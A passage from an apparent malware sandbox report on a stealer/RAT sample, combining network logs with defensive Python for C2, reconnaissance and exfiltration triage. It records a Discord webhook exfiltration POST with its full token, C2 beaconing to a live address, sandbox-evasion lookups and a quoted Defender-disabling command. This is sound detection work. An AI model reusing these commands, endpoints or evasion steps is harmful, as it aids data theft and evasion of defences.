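    """
    return sorted(set(IPV4.findall(cmdline)))


if __name__ == "__main__":
    hits = scan(SAMPLE_TREE)
    for f in sorted(hits, key=lambda f: f.severity):
        print(f"[{f.severity}] {f.rule} (depth {f.depth}): {f.cmdline[:80]}")
    print(summarize(hits))
    print("socket args:", socket_args(SAMPLE_TREE[7][1]))
```

The rules key on the service name and verb rather than on the full `RpcSs-TOGGLE` string, so they also catch the more common `sc config windefend start= disabled` variant; `sc qc windefend` alone is left out on purpose, since querying a service is normal administration.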

Network

• flag-us DNS 8.8.8.8.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 8.8.8.8.in-addr.arpa IN PTR
  Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
• flag-us DNS 104.219.191.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 104.219.191.52.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 172.210.232.199.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 172.210.232.199.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 72.32.126.40.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 72.32.126.40.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 95.221.229.192.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 95.221.229.192.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 99.193.161.193.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 99.193.161.193.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 58.55.71.13.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 58.55.71.13.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 154.239.44.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 154.239.44.20.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 200.163.202.172.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 200.163.202.172.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 171.39.242.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 171.39.242.20.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS 60.153.16.2.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 60.153.16.2.in-addr.arpa IN PTR
  Response: 60.153.16.2.in-addr.arpa IN PTR a2-16-153-60.deploy.static.akamaitechnologies.com
• flag-us DNS 11.227.111.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request: 11.227.111.52.in-addr.arpa IN PTR
  Response: (empty)
• flag-us DNS google.com (PING.EXE)
  Remote address: 8.8.8.8:53
  Request: google.com IN A
  Response: google.com IN A 142.250.180.14
• flag-us DNS www.google.com (msedge.exe)
  Remote address: 8.8.8.8:53
  Request: www.google.com IN A
  Response: www.google.com IN A 142.250.187.196
• flag-gb GET https://www.google.com/ (msedge.exe)
  Remote address: 142.250.187.196:443
  Request:
    GET / HTTP/2.0
    host: www.google.com
    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
    sec-ch-ua-mobile: ?0
    dnt: 1
    upgrade-insecure-requests: 1
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    sec-fetch-site: none
    sec-fetch-mode: navigate
    sec-fetch-user: ?1
    sec-fetch-dest: document
    accept-encoding: gzip, deflate, br
    accept-language: en-US,en;q=0.9
  Response:
    HTTP/2.0 429
    date: Fri, 10 Jan 2025 15:13:10 GMT
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    cache-control: no-store, no-cache, must-revalidate
    content-type: text/html
    server: HTTP server (unknown)
    content-length: 3078
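The PTR queries above reverse addresses seen during the run, and one of them, 99.193.161.193.in-addr.arpa, is the configured C2 193.161.193.99 read backwards; the rest are resolver and CDN infrastructure or addresses with no reverse record at all. The Python below is an added example, not tria.ge's code: it turns each in-addr.arpa name back into an address, matches it against the C2 list from the Malware Config section, and labels everything else as resolved, loopback or unresolved. The DNS sample is copied from the entries above (answers with the dots restored); the label names are this example's own.

```python
"""Reverse-DNS triage against an extracted C2 list (added example, not tria.ge code)."""
import ipaddress

# C2 addresses from the report's Malware Config section; the loopback entries are
# kept because the config lists them.
CONFIG_C2 = {"127.0.0.1", "193.161.193.99"}

# Constructed sample copied from the DNS entries above: (query name, type, answer or None).
SAMPLE_DNS = [
    ("8.8.8.8.in-addr.arpa", "PTR", "dns.google"),
    ("104.219.191.52.in-addr.arpa", "PTR", None),
    ("172.210.232.199.in-addr.arpa", "PTR", None),
    ("72.32.126.40.in-addr.arpa", "PTR", None),
    ("95.221.229.192.in-addr.arpa", "PTR", None),
    ("99.193.161.193.in-addr.arpa", "PTR", None),
    ("58.55.71.13.in-addr.arpa", "PTR", None),
    ("154.239.44.20.in-addr.arpa", "PTR", None),
    ("200.163.202.172.in-addr.arpa", "PTR", None),
    ("171.39.242.20.in-addr.arpa", "PTR", None),
    ("60.153.16.2.in-addr.arpa", "PTR", "a2-16-153-60.deploy.static.akamaitechnologies.com"),
    ("11.227.111.52.in-addr.arpa", "PTR", None),
    ("google.com", "A", "142.250.180.14"),
    ("www.google.com", "A", "142.250.187.196"),
]

PTR_SUFFIX = ".in-addr.arpa"


def ptr_to_ip(name):
    """Return the IPv4 address a reverse-zone name describes, or None if it is not one.

    "99.193.161.193.in-addr.arpa" -> "193.161.193.99": the octets are stored
    least-significant first, so they are reversed and validated as an address.
    """
    if not name.lower().endswith(PTR_SUFFIX):
        return None
    octets = name[:-len(PTR_SUFFIX)].split(".")
    if len(octets) != 4:
        return None  # classless delegations and IPv6 (ip6.arpa) are out of scope here
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def triage(dns_entries, c2_ips):
    """Map each address touched by a lookup to a label.

    c2          the address is in the extracted config
    loopback    127.0.0.0/8, never meaningful as remote infrastructure
    resolved    a PTR answer (or A answer) exists, usually known infrastructure
    unresolved  no reverse record; worth a second look but not proof of anything
    """
    labels = {}
    for qname, qtype, answer in dns_entries:
        ip = ptr_to_ip(qname) if qtype == "PTR" else answer
        if ip is None:
            continue
        if ip in c2_ips:
            label = "c2"
        elif ipaddress.ip_address(ip).is_loopback:
            label = "loopback"
        elif answer:
            label = "resolved"
        else:
            label = "unresolved"
        labels[ip] = label
    return labels


def c2_hits(dns_entries, c2_ips):
    """Sorted list of configured C2 addresses that actually appeared in the trace."""
    return sorted(ip for ip, label in triage(dns_entries, c2_ips).items() if label == "c2")


if __name__ == "__main__":
    for ip, label in triage(SAMPLE_DNS, CONFIG_C2).items():
        print(f"{label:10} {ip}")
    print("C2 seen in trace:", c2_hits(SAMPLE_DNS, CONFIG_C2))
```

Matching on the reversed address rather than on the PTR string avoids false negatives when a resolver returns a differently cased or trailing-dot name, and the "unresolved" bucket is deliberately neutral: plenty of legitimate cloud addresses have no reverse record.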
• [GB] GET https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM (msedge.exe)
  Google's "sorry" (rate-limit/CAPTCHA) page fetched by the sandbox's own browser, not by Client.exe; background noise, not sample behaviour.
  Remote address: 142.250.187.196:443
  Request:
    GET /sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
    host: www.google.com
    dnt: 1
    upgrade-insecure-requests: 1
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    sec-fetch-site: none
    sec-fetch-mode: navigate
    sec-fetch-user: ?1
    sec-fetch-dest: document
    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
    sec-ch-ua-mobile: ?0
    accept-encoding: gzip, deflate, br
    accept-language: en-US,en;q=0.9
    cookie: AEC=AZ6Zc-Xvv63SM4RIPET1kCS1GDIa4AreqUTNd7pIUh2_54jbZPRENHzDjdk
    cookie: __Secure-ENID=24.SE=Cjahek_RxIqtalrYZZcOFW0EHtiBHH2Sk3HvKeGWyfLjeyaG_nbxa2p214YwEc4pSFe2iXlcWChpmYRX3qUYfrMiZvCYHalvVK4y1EBHU3lAWuDRCdSc0iVgap5JiudgvGwb1u1mZIPjdlVCr3gbRShZvc0rgQrLt-uPjML-YHI5eNEQ9z-A20gLMvfZm0oCiPqYnCUB
• [US] DNS PTR 196.187.250.142.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  196.187.250.142.in-addr.arpa IN PTR
  Response: 196.187.250.142.in-addr.arpa IN PTR lhr25s33-in-f4.1e100.net
• [US] DNS PTR 134.32.126.40.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  134.32.126.40.in-addr.arpa IN PTR
  Response: (none recorded)
• [US] DNS PTR 227.187.250.142.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  227.187.250.142.in-addr.arpa IN PTR
  Response: 227.187.250.142.in-addr.arpa IN PTR lhr25s34-in-f3.1e100.net
• [US] DNS PTR 195.187.250.142.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  195.187.250.142.in-addr.arpa IN PTR
  Response: 195.187.250.142.in-addr.arpa IN PTR lhr25s33-in-f3.1e100.net
• [US] DNS PTR 14.179.89.13.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  14.179.89.13.in-addr.arpa IN PTR
  Response: (none recorded)
• [US] DNS A icanhazip.com (Client.exe)
  Remote address: 8.8.8.8:53
  Request:  icanhazip.com IN A
  Response: icanhazip.com IN A 104.16.185.241
            icanhazip.com IN A 104.16.184.241
• [US] GET http://icanhazip.com/ (Client.exe)
  Public-IP discovery: icanhazip.com answers with the caller's address as plain text, so the 15-byte body (not captured by the sandbox) is the egress IPv4 address plus a trailing newline. Note the request goes out over cleartext HTTP.
  Remote address: 104.16.185.241:80
  Request:
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
  Response:
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 15:18:40 GMT
    Content-Type: text/plain
    Content-Length: 15
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=98VLGPOMoeHa7qd5n.Q7qNbcdGTfs2zOyzmmVibNsEo-1736522320-1.0.1.1-9W3i._1Z46rJFDeDwaJQG.yMSayGQ6wevWC38EG2X0qRuZwSl0VvWvsoatJpMmreYWnXZ4Z0cvMmZ_4tOmcCXg; path=/; expires=Fri, 10-Jan-25 15:48:40 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8ffda417d842ef31-LHR
    alt-svc: h3=":443"; ma=86400
• [US] GET http://icanhazip.com/ (Client.exe; second lookup, 3 s after the first)
  Remote address: 104.16.185.241:80
  Request:
    GET / HTTP/1.1
    Host: icanhazip.com
  Response:
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 15:18:43 GMT
    Content-Type: text/plain
    Content-Length: 15
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=DEm2ts2LtRoK5I6kF948JUdAyChzfxwV.okxyp0Xjgo-1736522323-1.0.1.1-Xo5KvnUwS70VvFJXDQ2_ayjOjx0dKyuiuWy0Mym.GJHZffmOPJh9wV6RZjug421Ub18xxx3SmH1LxAYxpH6uOQ; path=/; expires=Fri, 10-Jan-25 15:48:43 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8ffda428ddc0ef31-LHR
    alt-svc: h3=":443"; ma=86400
• [US] DNS A ip-api.com (Client.exe)
  Remote address: 8.8.8.8:53
  Request:  ip-api.com IN A
  Response: ip-api.com IN A 208.95.112.1
• [US] GET http://ip-api.com/line/?fields=hosting (Client.exe)
  Anti-analysis check of the kind StormKitty performs: ip-api.com's /line/ endpoint returns one plain-text value per line, so the 6-byte body (not captured) is consistent with "false" plus a newline, i.e. the sandbox's egress IP was not classified as hosting/VPS and the sample kept running. A "true" answer (5 bytes) is what a stealer uses to decide it is inside an analysis environment.
  Remote address: 208.95.112.1:80
  Request:
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
  Response:
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 15:18:41 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
• [US] DNS PTR 241.185.16.104.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  241.185.16.104.in-addr.arpa IN PTR
  Response: (none recorded)
• [US] DNS PTR 1.112.95.208.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  1.112.95.208.in-addr.arpa IN PTR
  Response: 1.112.95.208.in-addr.arpa IN PTR ip-api.com
• [US] DNS A api.mylnikov.org (Client.exe)
  Remote address: 8.8.8.8:53
  Request:  api.mylnikov.org IN A
  Response: api.mylnikov.org IN A 104.21.44.66
            api.mylnikov.org IN A 172.67.196.114
• [US] GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b (Client.exe)
  Wi-Fi BSSID geolocation: the sample submits a Wi-Fi BSSID (normally that of the access point the host is associated with) to a public wardriving database to place the victim on a map without GPS. The BSSID 6a:27:bf:6a:69:8b has the locally-administered bit set (first octet 0x6a), so it is not a vendor-assigned address; the 88-byte JSON body was not captured.
  Remote address: 104.21.44.66:443
  Request:
    GET /geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b HTTP/1.1
    Host: api.mylnikov.org
    Connection: Keep-Alive
  Response:
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 15:18:43 GMT
    Content-Type: application/json; charset=utf8
    Content-Length: 88
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Cache-Control: max-age=2678400
    CF-Cache-Status: MISS
    Last-Modified: Fri, 10 Jan 2025 15:18:43 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mc8%2FjqHyR%2FGRYXMWeBPwCtvJjbkzoorDZRfPtt09pyjSwRMFt5P7rHIHMaIIfr%2BaorvByVLgvD8IwinFYrjE8MutQ3XkIsXGZRFPJmq3c988r%2FjdUIl2keT4oczR0bnx7HIM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=0; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 8ffda429ea379469-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=26818&min_rtt=26397&rtt_var=6239&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=412&delivery_rate=141550&cwnd=252&unsent_bytes=0&cid=1dd36f9f47291c7d&ts=291&x=0"
• [US] DNS PTR 66.44.21.104.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request:  66.44.21.104.in-addr.arpa IN PTR
  Response: (none recorded)
• [US] DNS PTR 66.44.21.104.in-addr.arpa (repeat; no response logged)
  Remote address: 8.8.8.8:53
  Request:  66.44.21.104.in-addr.arpa IN PTR
• [US] DNS A discord.com (Client.exe)
  Remote address: 8.8.8.8:53
  Request:  discord.com IN A
  Response: discord.com IN A 162.159.128.233
            discord.com IN A 162.159.136.232
            discord.com IN A 162.159.137.232
            discord.com IN A 162.159.135.232
            discord.com IN A 162.159.138.232
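The Client.exe requests above, taken together, are the stealer's reconnaissance-then-exfiltration chain: public-IP discovery, a hosting/VPS check used as an anti-analysis gate, Wi-Fi BSSID geolocation, and finally the Discord webhook POST that follows. The script below is an added example, not tria.ge tooling and not code from the sample: it replays that sequence from an event list constructed by hand from this report (bodies were not captured, so the hosting verdict is inferred from Content-Length, an assumption marked in the code), classifies each request, extracts the webhook id/token, decodes the webhook's creation time from its Discord snowflake id, and reads the 404 as a dead webhook. The stage names and heuristics are the author's own.

```python
"""Triage of the Client.exe network chain from the report above (added example)."""
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed from the log entries on this page: (process, method, url, status, response_length).
# Status/length are None where the report shows no response for the entry.
EVENTS = [
    ("Client.exe", "GET", "http://icanhazip.com/", 200, 15),
    ("Client.exe", "GET", "http://icanhazip.com/", 200, 15),
    ("Client.exe", "GET", "http://ip-api.com/line/?fields=hosting", 200, 6),
    ("Client.exe", "GET", "https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b", 200, 88),
    ("Client.exe", "POST", "https://discord.com/api/webhooks/1016614786533969920/"
                           "fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true", 404, 45),
    ("msedge.exe", "GET", "https://www.google.com/sorry/index?continue=https://www.google.com/", None, None),
]

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, the Discord snowflake epoch
DISCORD_HOSTS = {"discord.com", "discordapp.com", "canary.discord.com", "ptb.discord.com"}


def snowflake_time(snowflake: int) -> datetime:
    """Creation time encoded in a Discord snowflake: the upper 42 bits are ms since the Discord epoch."""
    return datetime.fromtimestamp(((snowflake >> 22) + DISCORD_EPOCH_MS) / 1000, tz=timezone.utc)


def discord_webhook_info(url: str) -> Optional[dict]:
    """Return {id, token, created} for a Discord webhook URL, or None if the URL is not one."""
    parts = urlsplit(url)
    if parts.hostname not in DISCORD_HOSTS:
        return None
    segs = parts.path.strip("/").split("/")
    if len(segs) < 4 or segs[:2] != ["api", "webhooks"] or not segs[2].isdigit():
        return None
    wid = int(segs[2])
    return {"id": wid, "token": segs[3], "created": snowflake_time(wid)}


def is_locally_administered(mac: str) -> bool:
    """True when the U/L bit (0x02) of the first octet is set, i.e. the MAC is not vendor-assigned."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def classify(process, method, url, status, length) -> Optional[dict]:
    """Map one request to a stealer stage; None for traffic that is not an indicator."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    q = parse_qs(parts.query)
    if host == "icanhazip.com":
        return {"stage": "public-ip discovery", "process": process}
    if host == "ip-api.com" and parts.path.startswith("/line/") and q.get("fields") == ["hosting"]:
        # ASSUMPTION: /line/ returns one value per line and the body was not captured,
        # so infer it from its size: "true\n" is 5 bytes, "false\n" is 6.
        verdict = {5: "true", 6: "false"}.get(length, "unknown")
        return {"stage": "hosting/VPS check (anti-analysis)", "process": process, "hosting": verdict}
    if host == "api.mylnikov.org" and "bssid" in q:
        bssid = q["bssid"][0]
        return {"stage": "Wi-Fi BSSID geolocation", "process": process, "bssid": bssid,
                "locally_administered": is_locally_administered(bssid)}
    hook = discord_webhook_info(url)
    if hook and method == "POST":
        # Discord answers a successful webhook POST with 204, or 200 when ?wait=true is set.
        return {"stage": "Discord webhook exfiltration", "process": process,
                "webhook_id": hook["id"], "webhook_created": hook["created"].date().isoformat(),
                "delivered": status in (200, 204),
                "note": "404: webhook deleted or revoked, nothing delivered" if status == 404 else ""}
    return None


def triage(events) -> list:
    """Classify every event and collapse repeated stages (icanhazip.com was queried twice)."""
    seen, findings = set(), []
    for f in (classify(*e) for e in events):
        if f and f["stage"] not in seen:
            seen.add(f["stage"])
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The snowflake decode is the useful part for an analyst: it dates the webhook to September 2022, more than two years before this run, and combined with the 404 it tells you the exfiltration channel had already been torn down when the sample was detonated.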
• POST https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true
  Client.exe
  Remote address: 162.159.128.233:443
  Request
  POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: discord.com
  Content-Length: 2200
  Expect: 100-continue
  Connection: Keep-Alive
  Response
  HTTP/1.1 404 Not Found
  Date: Fri, 10 Jan 2025 15:18:46 GMT
  Content-Type: application/json
  Content-Length: 45
  Connection: keep-alive
  Cache-Control: public, max-age=3600, s-maxage=3600
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  x-ratelimit-limit: 5
  x-ratelimit-remaining: 4
  x-ratelimit-reset: 1736522327
  x-ratelimit-reset-after: 1
  via: 1.1 google
  alt-svc: h3=":443"; ma=86400
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pcT4vqhxHtTgsz1wGB%2Fx%2BbMrvBsfCPcFr0mnJITcO5i4faqtQd3McrR2QjHySDc%2Bt%2BFB7X0Kz4RPXR3iDLifNJssdP4D1%2FaGYykQ%2BcQnEV%2BgwI%2BcotJfMPVTimW"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Set-Cookie: __cfruid=e3f41ac47c5129c6b21bf3a7d54d1f197d458979-1736522326; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  Set-Cookie: _cfuvid=BlCNHWOODE45kITlHyhoSKVTy9DvmI.IXkBqxjybPOM-1736522326154-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  Server: cloudflare
  CF-RAY: 8ffda4399b8e944e-LHR
• DNS 233.128.159.162.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  233.128.159.162.in-addr.arpa  IN PTR
  Response
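The flow rows of this report, parsed and scored for the three behaviours they show: repeated TLS sessions from Client.exe to the configured C2 193.161.193.99:64240 (19 sessions in this section) next to the dead loopback C2 entries, the public-IP / hosting / BSSID-geolocation lookups the stealer runs before reporting, and the Discord webhook POST. This is an added example, not code from the Triage report or from either malware family; the input is a subset of this page's flow rows transcribed into an assumed pipe-separated layout, and the reading of the two byte columns as sent then received, the decimal size units, the recon host list and the session threshold are this example's assumptions.

```python
"""Score Triage network-flow rows for C2 beaconing, sandbox/geo reconnaissance
and webhook exfiltration.  Added example, not part of the Triage report: rows are
transcribed from this page into an assumed layout of
'dest | proto | process | sent | received | pkts sent | pkts received [| METHOD URL STATUS]';
column meaning, size units and thresholds are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed input: a subset of the flow rows on this page ("-" = field not shown).
FLOWS_TXT = """\
193.161.193.99:64240 | tls | Client.exe | 33.2kB | 303.2kB | 309 | 389
193.161.193.99:64240 | tls | Client.exe | 708.1kB | 208.1kB | 900 | 689
193.161.193.99:64240 | tls | Client.exe | 456 B | 361 B | 6 | 5
193.161.193.99:64240 | tls | Client.exe | 74.5kB | 2.0MB | 1095 | 1610
193.161.193.99:64240 | tls | Client.exe | 14.5kB | 339.0kB | 214 | 260
127.0.0.1:4449 | - | Client.exe | - | - | - | -
142.250.187.196:443 | tls, http2 | msedge.exe | 2.5kB | 11.3kB | 19 | 24
104.16.185.241:80 | http | Client.exe | 464 B | 1.3kB | 8 | 5 | GET http://icanhazip.com/ 200
208.95.112.1:80 | http | Client.exe | 310 B | 347 B | 5 | 4 | GET http://ip-api.com/line/?fields=hosting 200
104.21.44.66:443 | tls, http | Client.exe | 814 B | 4.5kB | 9 | 9 | GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b 200
162.159.128.233:443 | tls, http | Client.exe | 3.3kB | 4.8kB | 11 | 10 | POST https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true 404
"""

_SIZE_RE = re.compile(r"^([\d.]+)\s*([kM]?B)$")
_UNITS = {"B": 1, "kB": 10**3, "MB": 10**6}  # decimal prefixes (assumed)
RECON_HOSTS = {"icanhazip.com", "ip-api.com", "api.mylnikov.org"}  # public IP, hosting flag, BSSID geolocation
WEBHOOK_RE = re.compile(r"^https://discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)")
BEACON_MIN_SESSIONS = 3  # assumed: repeated TLS sessions to one non-443 endpoint


def parse_size(text: str) -> int:
    """'708.1kB' -> 708100, '456 B' -> 456, '-' -> 0."""
    text = text.strip()
    if text == "-":
        return 0
    m = _SIZE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(round(float(m.group(1)) * _UNITS[m.group(2)]))


@dataclass
class Flow:
    dest: str
    proto: str
    process: str
    sent: int
    recv: int
    http: Optional[Tuple[str, str, int]]  # (method, url, status) when the row carried one


def parse_flows(text: str) -> List[Flow]:
    flows = []
    for line in text.splitlines():
        f = [p.strip() for p in line.split("|")]
        if len(f) < 7:
            continue
        http = None
        if len(f) >= 8:
            method, url, status = f[7].split()
            http = (method, url, int(status))
        flows.append(Flow(f[0], f[1], f[2], parse_size(f[3]), parse_size(f[4]), http))
    return flows


def summarize(flows: List[Flow]) -> Dict[Tuple[str, str], Tuple[int, int, int]]:
    """Per (process, destination): session count, bytes sent, bytes received."""
    agg = defaultdict(lambda: [0, 0, 0])
    for f in flows:
        a = agg[(f.process, f.dest)]
        a[0] += 1
        a[1] += f.sent
        a[2] += f.recv
    return {k: tuple(v) for k, v in agg.items()}


def findings(flows: List[Flow]) -> List[Tuple[str, str, str]]:
    """(kind, subject, detail) triples; kinds: loopback-c2, c2-beacon, recon, webhook-exfil."""
    out = []
    protos = defaultdict(set)
    for f in flows:
        protos[(f.process, f.dest)].add(f.proto)
    for (proc, dest), (n, tx, rx) in summarize(flows).items():
        host, _, port = dest.rpartition(":")
        if host == "127.0.0.1":
            out.append(("loopback-c2", dest, f"{proc}: {n} attempt(s); the extracted config lists loopback C2s"))
        elif "tls" in protos[(proc, dest)] and port != "443" and n >= BEACON_MIN_SESSIONS:
            out.append(("c2-beacon", dest, f"{proc}: {n} TLS sessions on port {port}, {tx} B out / {rx} B in"))
    for f in flows:
        if f.http is None:
            continue
        method, url, status = f.http
        if (urlsplit(url).hostname or "") in RECON_HOSTS:
            out.append(("recon", url, f"{method} -> {status}: public-IP / hosting / geolocation lookup"))
        m = WEBHOOK_RE.match(url)
        if m and method == "POST":
            state = "404: webhook no longer exists, payload not delivered" if status == 404 else f"HTTP {status}"
            out.append(("webhook-exfil", f"discord webhook id {m.group(1)}", state))
    return out
```

Calling findings(parse_flows(FLOWS_TXT)) yields one c2-beacon entry for 193.161.193.99:64240, one loopback-c2 entry for 127.0.0.1:4449, three recon entries and one webhook-exfil entry; the msedge.exe flow to Google on 443 is left alone. Two practitioner notes on what the rows themselves show: the 708.1kB outbound and 2.0MB inbound sessions to the C2 are the ones worth pulling from the pcap, since AsyncRAT-style clients receive plugins from the server and push collected data back over the same channel; and the Discord webhook POST (2200-byte form body, matching the StormKitty webhook reporting flagged in the signatures) came back 404, which is what the Discord API returns for a webhook that has been deleted, so that copy of the stealer output was never delivered. The webhook ID and token are still a valid indicator and the IP-check trio (icanhazip.com, ip-api.com with fields=hosting, api.mylnikov.org by BSSID) is a cheap network signature for this family's pre-exfil profiling.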
Network flows (destination | URL where shown | protocol | process | bytes sent / received | packets sent / received; the HTTP and DNS exchanges carried by a flow are listed beneath it):

• 127.0.0.1:4449  Client.exe
• 193.161.193.99:64240  tls  Client.exe  33.2kB / 303.2kB  309 / 389
• 193.161.193.99:64240  tls  Client.exe  7.7kB / 1.3kB  21 / 17
• 193.161.193.99:64240  tls  Client.exe  708.1kB / 208.1kB  900 / 689
• 193.161.193.99:64240  tls  Client.exe  3.0kB / 1.1kB  24 / 22
• 193.161.193.99:64240  tls  Client.exe  456 B / 361 B  6 / 5
• 193.161.193.99:64240  tls  Client.exe  508 B / 361 B  7 / 5
• 142.250.187.196:443  https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM  tls, http2  msedge.exe  2.5kB / 11.3kB  19 / 24
    HTTP Request: GET https://www.google.com/
    HTTP Request: GET https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    HTTP Response: 429
• 127.0.0.1:4449  Client.exe
• 127.0.0.1:4449  Client.exe
